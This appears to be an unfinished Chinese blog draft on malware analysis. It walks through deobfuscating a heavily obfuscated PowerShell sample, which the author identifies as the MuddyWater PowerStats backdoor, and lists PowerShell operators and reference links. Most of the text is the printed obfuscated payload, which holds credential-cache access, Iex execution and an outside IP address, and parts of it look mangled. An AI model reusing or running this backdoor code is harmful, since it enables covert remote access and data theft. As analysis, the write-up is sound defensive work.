(6SX{1}{0}6SilZ+ilZX-f 2A182Ri+2Ri2A1,2Gv0Dk+0Dku+GvuA1r52A1) -VaLuE) )BLT+BLT; -JOIN (&(6SX{1}{2ch7+ch7}{0}6SX-f 2A1E2A1,2A1va2A1,2A1riAbL2A1) (6SX{0}{1}6SX -f 2wqH,wqH WMAwSO4,SO4OKPwp,dzm7n8+m7n8tT+ztTwp catch{ trgEnaqf7x+f7xbzCebklf7x+fN3w+N3wOKP+OKP7xOKP+OKP ‘+’ dwp,RxQOM+QOMY+RxYcTw+cTwdwprdwp,dGRU,GRU try{ Lo6bhgdwp,dwpef7x+f7QOM+QOMxdwp,dwpIPSBNhdwp,dwpaXB0QmxvY2sgPSB7DQoJCQkkYyAhRV+hRV9ICJlY2hvIg0KCQl9Lkl7Sa,l7Sax, Lo6hRV+hRVdJd3+JdSO4,SN3w+N3wO4+3YpeamRedwp,dwpcmdBt3+Bt3aZD)){ f7x+fOKl7Sa)).rePlace(([ChAr0Dk+xXW+xXW0Dk]87+[ChAr]77+[ChAr]65),[striNg][ChAr]39).rePlace(([ChAr]69+[ChAr]70+[ChAr]121),l7SaAbkKl7Sa).rePlace(l7SaHyFl7Sa,l7SaWI7l7Sa) AbkK Iex a4h).rEpLaCE(([cHaR]65+[cHaR]98+[cHaR]107+[cHaR]75),a4h0wda4h).rEpLaCE(([cHaR]116+2Ri+2Ri[cHaR]107+[cHaR]121+[cHaR]86),[StRING][cHaR]34cTw+cTw).rm7n8+m7n8EpLcTw+cTwaCE(awUd,wUdRVOKP+OKP+hKVy+KVyRVLo6Yi) hRV+hRV% Lofjt+fjt6n Lo6Eifjt+fjt = JIv,JIvYEulAHOnVuOY.) )f7OZc,OZcKPf7xoding]::UTF8.GetString([System.Condwp,dwp+hRVdwp,dwpOf(aZD/aOKP+BJK,BJKgrag = Lo6rapOKP+OKP_zft dhND,hNDBReVkIt (.GRU,GRUwp,dwphRV1nR,1nilZ’+’+ilZRPrf7x+f7g5u+g5uxovidOKP+OKPer dwp,dwpRV+hRV 1Yj+1Yj Lo6pzq = Lo6pzq.suOKP+OKPbstrihf7x+f7xRV+hRVng(1fOKP+OKP7x+f7x,Lo6pzqNfx,NfxnJ50+nJ50oadaZD)){ OKP+OKP tf7x+f7xry{ RxY+RxY f7x+f7x OZc,1nR,1nR4}{268}{178}{ch7+ch727JIv,JIv2}{2}{240}{1f7x+f7x27}{72f7x+f7xECi+ECi}{162}{49}{47}{131’+’}{87}{2xXW+xXW2}{j1p+j1p93}{2Ri+2Ri61}{2l7Sa,l7SGqh+Gqha((WMfqh+fqhA&(weg{1}{0}{2}{3}weg -fGvu-VariAGvu,GvuSetGvu,GwUd,wUd31[Cilbup:VNe7Szo (& Cq5 ); (&(m7n8lSm7n8) (Cq5{2}{1}{3}{0}Cq5yDv,yDvhttp://46.105fOKPQOM+QOM+OKQOM+QOMP7x+f7'+'xfqh+fqh.84.146dwp,dwf1nR,1nRshRf0Dk+0Dk7x+f7xV+ch7+ch7hRVb +=f7x+f7x Sg5u+g5uBNj1p+j1p**SjaA,jaAVedentiSO4,S’+’O4cALpeRC- )ch7
) )b4BvNfx,Nfx) Lo6vasb fKVy+KVy7x+f7x f7x+f7x if(Lo6vasb -f7x+f7xef7x+fOKP+OKP7xq aZdwp,dwpnhRf7x+f7xV+f7x+f7xhRVdwp,dwpzLlRvQXJyYX1Yj+1YjkoKQ==OJd3+Jd3KP+OKPShdwp,dwpOKP+OKP:DefaultChRV+hRVrhRV+f7x+f7xWNLg)) -crEPlace([chaR]97+[chaR]51+[chyDv,yDv]34).rEplACE(([char]103+[char]74+[char]51),QOMFLoQOM) mYU . ((VARIAblE QOMMDRQOM).NAmE[3,11,2]-jOINQOMQOM) yDv,yDvn zOKP+OKPq5dwp,dwpOKP+OKPpzq, (SBNc:Dtf7x+f7xVpf7x+f7xrogramda1Yj+xXW+xXW1YjtaDtJl4+Jl4VSBdwp,dwpe 1){ OKP+OKP f7x+f7x hRdwp,dwpal:url = Lo6C[Lo6eaf7x+f7xq]
}
functionOKP+OKP OKP+OKPertChfu([string]Lo6dOKP+OKPwpb4B,b4B2{}32{}31{}4{}1{}71{}5{}8{}42{}m7n8+m7n83{}9{}WMA+WMA21{6Fz((( ( yDv,yDvI.)a4hCa4h,a4htama4h,a4hsEha4h f- 4bM}0{}2{}1{4bM(::eULAV.) )4bMN4b1Yj+1YjM+4bMr2E:’+’e4bM+4bMlBAirA4bM+4bMV4bM( )a4hMeTiDa4h,a4hLa4h,a4hIhca4hAL2+AL2 f- 4bM}2{}1{}0{4bM(&( ]gNiRts[( +4bM5lr0Dk+0Dk,5lr6x= [SOKP+OKPysteOKP+OKPm.Text.Encf7x+OKP+OOZc,OZc try{ Lo6xrl, Lof7x+f7x6n dwp,dwpqb4B,b4B
) )421]rAhC[]gnirts[,fqhVZ8fqh(ecalpER.)43]rAhC[]gnirts[,)901]rAhC[+76]rAhC[+221]rAhC[((ecalpER.)93]rAhC[]gnirts[,)811]rAhC[+65]rAhC[+76]rAhC[((ecalpER.)63]rAhC[]gnirts[,fqhpgmfqh(ecalpEKVy+KVyR.)69]rAhC[]gnirts[,fqhgQOM+QOMvWfqh(ecalpER.)fqh
) ) ) } mCzEUgvWlAVmCz.}_{pgm{)v8C%v8C(& VZ8) )v8Ctfv8C,v8CelOv8C,v8CtThGIrv8C f- mCz}2{}1{}0{mCz( , v8C.vt95+vt95v8C, mCz (v8C (((m9N{27}{28}{8}KS6h,KS6hg)
yDv,yDvp Lo6y= [Systemf7x+hND,hNDg][CHar]34) qd5s. ( DozEnV:coMsPEc[4,24,25]-JOInvt95vt95)NFOg ] ][RAHC[( )vt954vt95,vt95dtQJevt95f- NFOg}0{}1{NFOg( )vt95Tvt95,vt95eSvt95 f- NFOg}1{}0{NFOg(wUd,wUdf7x+f7xb3N1cmUoKQ0KCOKP+OKPX0NCglpZigkRxY+RxYYyhRV+h4n6+4n6Rch7+ch7V5TdGj1p+j1pFydHNXaXRof7x+f7xKCd3cml0ZS1ob3GRU,GRU f7x+f7x Lo6Cevapvcnyf7x+f7x = NeilZ+ilZOKP+OKPw-ObjectOKP+OKP System.SOKP+OKPecurity.PrQOM+QOMinOKP+QOM+QOMOKPcipaldwp,dwpVfqh+fqh+hRVq.replaOKP+OKPce(adJIv,JIvwp,dwpme;j1p+j1p } cj1p+j1patch hRf7x+f7xV+hRV{ f7x+f7x retxXW+xXWuWNLg,WNLg&((gET-vAriavt95+vt95bp9D+p9DLE AL2MDRAL2).nAmE[3,11,2]fjt+fjt-JOiNAL2AL2)((AL2 &(jyb{1}{21Yj+1Yj}{0}jyb-nJ50+nJ50f P9reP9r,P9rsEt-VArIP9r,P9rAblP9r) (jybQOM+QOM{1}{0}jyb -fP9r3P9r,P9re4P9r) ( TYPe ) ; &yDv,yDvxn SilentlyContinue if(Lo6pzq.ShRV+hRVtartsWith(ShRV+hRVBNcdSBN)){Lovt95+vt956bhg = Lo6PWD;} OKP+OKP f7x+f7x LOKP+OKPoyDv,yDvRipLACeztTVbGztT,[Char]34) )D0w(wUd)).rEPlace(([ChAr]103+[ChAr]112+[ChAr]99),wUdCYlwUd).rEPlace(([ChAr]56+[ChAr]86+[ChAr]105),[StRiNg][ChAr]96).rEPlace(([ChAr]78+[ChAr]51+[ChAr]119),[StRiNg][ChAr]39) ) nJ50) -CREPLaCE([chAR]56+[chAR]71+[chAR]78+[chAR]88),[chAR]34 -CREPLaCE ([chAR]75+[chAR]120+[chAR]99+[chAR]72),[chAR]36-CREPLaCE([chAR]119+[chAR]85+[chAR]100),[chAR]39-RePLaCe nJ50CYlnJ50,[chAR]124)) ylhY ] ][rAhC[ ( )nJ50LnJ50,nJ507qnJ50 f-ylhY}0{}1{ylhY( )nJ50tnJ50,nJ50ESnJ50 f- ylhY}1{}0{ylhY(&;) )nJ50SnJ50,nJ50iRTnJ50,nJ50gnnJ50 F- ylhY}0{}1{}2{ylhY(]ePyT[ ( )nJ506rnJ50+nJ505nJ50+nJ50A:enJ50+nJ50lBAiraVnJ50( mEti-tES ;) )nJ50ynJ50,nJ50ArRKS6h,KS6hGY3+ )] ) GY3HTGrGSNELGY3.}6gEirGSx{s5e( nJ50+nJ50-..1-[}6GBJK,BJKCaLper-))OZcRV+hRVctOv8C+v8CKP+OKPvt95+vt95ion trgBF(){OKP+OKP try{ b4B,b4Bgn = New-ObjectYKV,YKV,dwpVbal:url + Lo6OKP+OKfjt+fjtP_.hRV+hRVException.Messdwp,dwp Lo6Ei = Lo6Ei / 2 f7x+f7x 0KVy+KVyni,0niry{ f7x+f7g5u+g5ux WMA+WMA Lo6pzq = [System.Text.Encoding]::AShROZc,OZcRV+hRV dwp,dwpRV+hRVing]Lo6k, OKPGqh+Gqh+OGqh+GqhKP[strOKP+OKPing]Lo6v){dwp,dwpg)
Jl4+Jl4} catch {
vt95+vt95 hRV+hRVLo6bhgf7x+f7x =OKP+OKP Lf7x+f7xo6_.Exception.dwp,dwpaZch7+ch7D) OKP+N3w+N3wOKP
function Zbq(Lo6l2Ri+2Ri7Sa,l7Sa79}OKP+OKP{241}{126f7x+f7x}{74}{22f7x+OKP+4n6+4n6OKPf7xKVy+KVy0}{234}{188}{260}{99}{231}{66}{56}f7x+f7x{168}fztT+ztT7x+f7x{19}fqh+fqh{2f7x+f7x02}knS-f dwpf7x+f7x % f7x+f7xLo6n hOZcf- nlK}31{}0{1Yj+1Yj}01{}21{}51{}5{}02{}2{}81{}1{}3{}6{}41{}4{}8{}91{}11vt95+vt95{}71{}61{}7{}9a4h+a4h{nlK(((()OZcOZcNIoJ-]52,51,4[cePSmOC:vnEGkf (.ECi(( tDr); -JOInp9D+p9DYrn+Yrn( &(tDr{2}{0}{1}tDr-f ECJIv,JIvp,dwOKP+OKPp } dwp,dwp+hRV+hRV+hOKP+OKPRV= trgNepu Ldwf7x+f7xp,dwpRVion.Message) trgEnaqf7x+f2A1+2A17xbdwpf7xJIv,j1p+j1pJIvI-tEa4h,a4hsa4h f- 4bM}2{}1{}0{4bM(&4n6(()4n64n6NIOj-]52,62,4[CepSmSO4 f-m1j}61{}8{}91{}5{}22{}71{}21{}42{}0{}32{}41{}02{}2{}4{}7{}72{}31{}01{}62{}9{}51{}11{}xXW+xXW6{}3{}1{}12{}81{}52{m1j(( m7n8( ( )m7n8Xm7n8+]5[ciLbUp:Vne7Szo+]wUd,wUdLpER.))5lj1p+j1prValuef7x+f7x Lfjt+fjto6v -Force -ErrorActOKP+OKPion Silentdwp,dwfqh+fqhpLohRV+hRV6erfJd3+Jd3hyg = SBNSBN } f7x+f7x return Lo6erfhf7x1nR,1nR5ld0NhRV+hRVsb1nR,1nRKP+OKwUd,wUdTnioj-]52,62,4[}CepsmCrFoCCrF:CrFvNe{oJ5 ( .Sauwgp vt95+vt95) BLT BLT BLTsfoBilZ+ilZLT vS(Nfx,NfxxRV+hRVturn (Get-dwp,dwplyContinue mQi OOKP+OKPuthRV+dwp,dOKP+OKPwf7x+f7xpSBNv8C+v8CfuncSBhRV+hOKP+OKPRVNf7x+f7x:SBNvt95+vt95cSBN}aZD)) f7x+f7x if (Lodwp,b4B,b4Be) trgEnGqh+Gqhaa4h+a4hqbzCebkl dN3w+N3wwpOKP+OKP,dwpRVgEnaqbzCebkl continue ztT+ztT KS6h,KS6hanJ50F- ylhY}1{}0{ylhY(]epYT[ ( )nJ500pnJ50+nJ50t:eLBainJ50+nJ50RavnJ50( meTI-TESKVy(()KVyKVynIOJ-]52,42,4[cepsmoc:vnExK4 (.KS6h,KS6hx+f7xBNfuncSBN:SBNrSBN,SBNdatadwp,dwpialshRV+2Ri+2RihRV = [Net.ChRV+hRVredentialCache]:f7x+f7x:DefaultCrOKP+OKPJd3+Jd3edentf7x+f7xiaOKP+OKPlsf7x+f7x f7x+f7x dwp,dwpbXByZXNzKQ0KICAgIdwp,dwpf7x+f7xhRV
f7x+KVy+KVyf7xwhile(Lo6KVy+KVytrue){ Yrn+Yrn write-host SBN1nR,1nRf7x+f7x3N1cmUohRV+hRVKhRV+hRVQ0KCXhRV+hRV0hRV+hRm7n8+m7n8VNCn0=SBN Lo5lr,5lrtemPj1p+j1proYrn+YrnpertKVy+KVyy -Path Lo6p -Name Lo6k -5lr,5lr263}{55}{110}{86}{90}{203}{105}{14}{160f7x+RxY+RxYf7x}{1Oa4h+a4hKP+OKP’+’71}{1f7x+f7x49}{hND,hND) )vt95Avt95,vt95Yarrvt95 f- NFOg}0{}1{NFOg(]EPYT[ ( )vt954vhPw:Evt95+vt95lvt95+vt95bAirAvt95+vt95Vvt95( )vt95i-tesvt95,vt95mevt95,vt95Tvt95 f- NFOg}1{}0{}2{NFOg(&1Yj(( hND,hNDRi+2Rif7x+f7x2}{27OKP+OKP}{205}{63}{1OKch7+ch7P+OKPf7OKP+OKPx+f7x99}{75}{192}{3f7x+f7x4}{52}{161}{136}{24f7x+f7x9}{258}{190}{226}{33}{276}{150}{2Yrn+Yrn52}{2A1+2A1237}{96}{207}{98}{147}{4n6+4n6213}{7}{193m7n8+m7n8}{15wUd,wUdhAr]39) uwf .( MrtVERbOSePrefErence.TOsTRING()[1,3]+j1pxj1p-JOINj1pj1p)dWr=}JxwwIzRwIzL{Mrt3Yp((SO4,SO4c[]gNiRTS[,Gvu0yjGvu(ECAlPER.)93]RAhc[]gNiRQOM+QOMTS[,GvuBJKGvNfx,Nfx Lo6sfdwp,dm7n8+m7n8wpPLlN0cmVhbVdyaXRlcigkSO4,SO4oc:vNEjE8 (& wqH,wqH= (Lo6Xi hwUd,wUdC,v8CAMv8C f-mCz}1{}2{}0{mCz(fQOM+QOMqh+b4B,b4Bdwp= LoP9r+P9r6pk; OKP+OKP Lo6f7x+f7xzlneenl = @(); m7n8+m7n8 for(Lo6i=0;OKP+OKP OKP+OKPdwp,dECi+ECiBJK,BJKNerEFJl4+Jl4m57eRpESom57BYKV,YKV,dwpi Ouf7x+f7xt-String OKP+OKP return LohRV+yDv,yDvdWr.))j1pj1p,j1prdM*j1p f- dWr}1{}0{dWr( )j1paiRAVj1p’+’,j1pELBj11Yj+1Yjp f-dWr}0{}1{dWr(&((&uwf j1pj1pnIoJ- ]) dWrKVy+KVyHTwIzgnewIzldWr.dWreUw’+’IzlavdWr.))dWrjXdWr+)j1pwRl:Ej1p,j11Yj+1YjplBj1p f-dWr}1{}0{dWr(+dWraIRdWr+dWraVdWr( )j1pIdj1p,j1prj1p f- dWr}0{}1{dWr(&( ( -..1 -[dWreUwIzLAvdWr.))dWrjXdWr+)j1pl:ElBj1p,j1pwRj1p f-dWr3Yp+3Yp}0{}1{dWr(+dWraIRdWr+dWraVdWvt95+vt95r( )j1QOM+1Yj+1YjQOMpIdj1p,j1prj1pf- dWr}0{}1{dWr(&( ; dWr (j1p&( 1ItEnv:PUBlIC[13]+1ItENV:pUbLIC[5]+NxXW+xXWfxXNfx)(j1p+j1p(((ZOM{7}{1}{5}{9}{25}{2}{8}{31}{23}{28}{21}{19}{15}{0}{27}{12}{14}{3}{24}{16}{22}{11}{30}{32}{18}{13}{4}{20}{1m7n8+m7n87}{6}{26}{10}{29}ZOM -f Nfxdwpghfre =hRV+hRV hND,hND+ECi7x+f7x,dwpRV+hRVyg = uggwqH,wqHf + BJK,BJKp,dwOKECi+ECiP+OKPpo6bhg = Lo6bhf7x+f7xg mcj1p+j1pTw+cTwQiJl4+Jl4 Out-StrGRU,GRU:dKS6h,KS6h{5}{24}{15}{29}{4}{22}{13}{7}{16}{6}{0}{30}hND,hND{32}{18}{11}{31}{19}{10}{12}{9}{21}{25}{26}{17}{14}{23}{20}{3}{1}{2}m9N-fjaA5u+g5uVqragvgWMA+WMAl = [systf7x+f7xem.secOKP+OKPurity.f7x+f7xprinc0ni,0ni+OKP return SBNErhRVdwp,dwp hRxXW+xXWVg5u+g5u+hRVcatch{ dwp,dwphRV+hRV2_OperatingSystem).OSArchitecture; hOKP+OKPRVdwp,dwpader RxY+RxnJ50+nJ50YLo6qngnOKP+OKP;
[StcTw+cTwringOKP+YKV,YKV5lr,5lrLdwp,dwpf_qngnf7x+f7xdwWMA+WMAp,dwpz '+'Lo6xrl Lo6f7x+f7xn
P9r+P9r Lo6zl_neenl += [convem7n8+m7n8rt]::ToChar([int]LAL2+AL2o6t)OKP+OKP cTKS6h,KS6hglobal:id) (PbzcerffPbqr(aZD{dwpOKP+OKP,dwphRBLT+BLTV+hRVlf7x+f7xace(aZf7x+f7xD-aZDJd3+Jd3OKP+OKP,aZDaZDf7x+f7x)hRV+hRV OKP+OKPreturn LhRV+hRVf7x+f7xo6bhgf7x+f’+’7OKP+OKPxchgdwpYKV,YKVfhyg
} funchRV+hRVtOZc,OZchRV Yrn+Yrn re2Ri+2Rif7x+f7xturn N3w+N3wSBN-SBN
OZc,OZcdwp,df7x+f7xYKV,YKVp,OKP2Ri+2Ri+OKPdwpPrinhRV+hRVcipal.Winddwp,dwp QOM+QOM } fqQOM+QOMh+fqh Nfx,Nfxu(ECAlPER.)Gvu
)BJKBJKGqvt95+vt95h+Gqhnioj-]52,51,4[CepsmOc:vnEV1a4h+a4hW ( . e7N)63]RaHC[,)84]RaHC[+111]RaHC[+511]RaHC[( ch7+ch7 ecALPErc- 93]RaHC[,BJKJd3BJKEcAlpER- 42jaA,jaAGvu1]raHC[( eCaLpeR-43]raHC[,Jd3GY3Jd3 eCaLpeR- 69]xXW+xXWraHKS6h,KS6hKP+OKPw-f7x+wUd,wUdilZ+ilZf7xObject SOKP+OKPystem.IO.Str3YpSO4,SO4OZc,OZcndowsPrincipal(Lo6JvaqbjfVqragvgl) BLT+BLT b4B,b4BHc[]GNiRts[,)601]RaKVy+KVyHc[+96]RaHcilZ+ilZ[+65]RaHc[((EcALPEr.))wqHuOY(&((ek5lr,5lr )a4ha4h =SFO9Qe(9QeWNLg,WNLg6hey SBNztT+ztTN9JtSBN (Lf7x+f7xo6glohRV+hRdwGvu+Gvupf7x+f7x,dwp f7x+v8C+v8Cf7xstOxXW+xXWKP+OKyvt95+vt95Dv,yDvf7x+f7x function Gqh+GqhtrgOKP+OKPCVC(xXW+xXW){ tryf7xOKP+OBJK,BJKjaA,jahND,hND functiof7x+f7xn BLT+BLTraPelcg(LOKP+OKPo6pk, Lo6cynvagrkg){
OZc,O’+’Zcdwpt.UTOKP+OKPF8Encoddwf7x+f7xp,dwpkNvbnRleHQuSOKP+OKPf7x+f7xOKP+OKPW52b2tlQBJK,BJKaZD + Lo6global:id) LocTw+cTw6qngndwp,dwp6Xi * Lo6Xi)f7x+f7xdwp,dOKP+OKPwp Lo6jrhRV+hRVoerd.Methof7x+f7xd f7x+f7x= SBNG’+’Yrn+YrnETSBN; P9r+P9r [OKP+OKPShRV+hRVystem.NetJIv f-lAe}51{}61{}41{}hND,hNDkZHOn6HOni3v{07hOKP(SO4,SO4hC[+701]RAhfjt+fjtC[( ecalPerC-93]RAhC[,P9rwqHP9recalPerC- 421v8C+v8C]RAhC[,)38]RAhC[+75]RAhC[+48]RAhC[( ecAlPer- 63]RAhC[,)401]RAhC[+77]RAhvt95+vt95C[+05]RAhC[( ecalPerC-)P9JIv,xXW+xXWJIv
)2Rix2Ri+]5[CiLBUP:vnEVX8+]31[cILbUP:VNEVX8 ( &pT2 )43]rAHc[,)76]rAHc[+121]rm7n8+m7n8AHc[+94]rAHc[( ECalperc-421]KVy+KVyrAHc[,2Ri8Gv2Ri ECalperc- 63]rAHc[,SO4,SO4als OKP+OKPLo6rBLT+BLTapbqr_qf7x+f7xngndwp,dwpYKV,YKV.j1p+j1p ((Gv cTw3Yp+3YpMDrfqh+fqhcTw).NaMe[3,11,2]-JOincTwcTw) ( (cTw &(qjt{0}{2}{1}QOM+QOMqjt-f p9Dsp9D,p9Demp9D,p9DEt-ITp9D) (qjtVarIABqjt+qjtlE:b1qjt+qjtP7qjt) ( TypEKS6hKS6hNioJ-]2,11,3[eMAN.)KS6hrdmKS6h ELBAiRAv((&’(( “, ‘.’ ,(“{2}{0}{1}”-f’TO’,’LefT’,’rIGht’) ) ) |.((&(‘gv’) (“{1}{0}” -f ‘dR‘,’M’)).”NA`me”[3,11,2]-joiN’’)
到这一步开始难了起来,就算有像上面一样的思路(把执行的参数换成输出),也找不到写代码的地方,这时候面对这样高度的混淆,需要增加一点小小的PowerShell知识🤓<a name="7dd57fa1"></a>### 了解PowerShell,混淆和解混淆[《Windows PowerShell实战指南(第3版)》](https://3lib.net/book/11643017/f3a458)<br />[【技术分享】根据powershell语言的特性来混淆代码的方法与原理](https://www.cnblogs.com/linuxsec/articles/7384582.html)<br />[《Tide重剑无锋 - 远控免杀从入门到实践(6)-代码篇-Powershell 》](https://www.freebuf.com/articles/system/227467.html)<br />[《反混淆powershell》](https://xz.aliyun.com/t/2923)<br />[《美创科技安全实验室 - PowerShell攻击的混淆方法总结》](http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_3320.html)<br />[《APT的思考: PowerShell命令混淆高级对抗》](https://cloud.tencent.com/developer/article/1639161)<a name="9cdd4a78"></a>#### 运算符由于其他简单的运算符基本上有计算机基础的人都知道,就不凑字数了,主要了解:```powershell-split:拆分运算符;-join:联接运算符;-f:格式运算符。-like:使用通配符 (*) 匹配;-notlike:使用通配符 (*) 不匹配;-match:配合正则表达式从数组中筛选出想要的内容;-replace:替换,支持正则表达式;
转码:char[十六进制数字]
写到这里,下班了😂明天再写啦~
下方为草稿
没有一气呵成写完,再重新写就真的很麻烦了
对混淆的代码进行解混淆,包括不限于上面的运算符以及char转码(可以使用Python处理),最后经多层解混淆后得到明文的PowerShell后门,经搜索该后门为MuddyWater常用的PowerStats后门:
网络连接
参考链接
若有收获,就点个赞吧
0 人点赞
